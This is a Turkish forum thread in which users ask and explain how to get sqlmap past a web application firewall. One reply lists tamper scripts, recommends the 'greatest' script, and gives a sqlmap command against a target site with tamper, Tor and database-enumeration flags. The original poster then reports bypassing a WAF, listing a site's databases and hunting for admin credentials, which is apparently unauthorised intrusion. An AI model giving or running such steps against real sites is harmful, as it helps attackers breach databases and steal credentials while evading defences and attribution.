Sqlmap WAF atlatma

TurkishMen0 · 17 Mar 2022

Basliktan da okudugunuz gibi sqlmap de WAF nasil atlatilir?

icehead · 17 Mar 2022

benimde aklımda olan bir konuydu.
en ufak bir sql sorgusu girdiğimde blocklanıyor.
şu konu belki işini görür.

SQLmap'i WAF Bypass (Tamper) Scriptleri ile Kullanma

Bilgi Güvenliği Uzmanı, Siber Güvenlik Uzmanı

www.ismailsaygili.com.tr

TurkishMen0 · 17 Mar 2022

icehead' Alıntı:
benimde aklımda olan bir konuydu.
en ufak bir sql sorgusu girdiğimde blocklanıyor.
şu konu belki işini görür.

SQLmap'i WAF Bypass (Tamper) Scriptleri ile Kullanma

Bilgi Güvenliği Uzmanı, Siber Güvenlik Uzmanı

www.ismailsaygili.com.tr

Yorumunuz icin tesekkür ederim ilk denemem de basarisiz oldum yarin tekrar deneyecegim.

RasperPascal · 17 Mar 2022

Merhaba değerli üye ;
Aşağıdaki adımları uygularırsa Waf geçmiş olursunuz

1-)Bypass Bulma

Kod:

cd /usr/share/sqlmap/tamper/
ls

yukardaki kod ile bize bypass dosyalarını bize gösterdi.

En iyi baypass kodu ;

Kod:

"greatest"

2-)Bypass uygulama

Kod:

sqlmap -u [sitenin sql açığı]

Kod:

--tamper=[bypass dosyanız] -tor --dbs

TurkishMen0 · 17 Mar 2022

RasperPascal' Alıntı:
Merhaba değerli üye ;
Aşağıdaki adımları uygularırsa Waf geçmiş olursunuz

1-)Bypass Bulma

Kod:

cd /usr/share/sqlmap/tamper/ ls

yukardaki kod ile bize bypass dosyalarını bize gösterdi.

En iyi baypass kodu ;

Kod:

"greatest"

2-)Bypass uygulama

Kod:

sqlmap -u [sitenin sql açığı]

Kod:

--tamper=[bypass dosyanız] -tor --dbs

Merhabalar cevabiniz icin tesekkür ederim sayenizde WAF atlattim ve dbs girdim ama admin giris bilgilerini bulamadim dbs de.

Sqlmap WAF atlatma

TurkishMen0

Üye

icehead

Uzman üye

SQLmap'i WAF Bypass (Tamper) Scriptleri ile Kullanma

TurkishMen0

Üye

SQLmap'i WAF Bypass (Tamper) Scriptleri ile Kullanma

RasperPascal

Katılımcı Üye

TurkishMen0

Üye

Sosyal medya sayfalarımız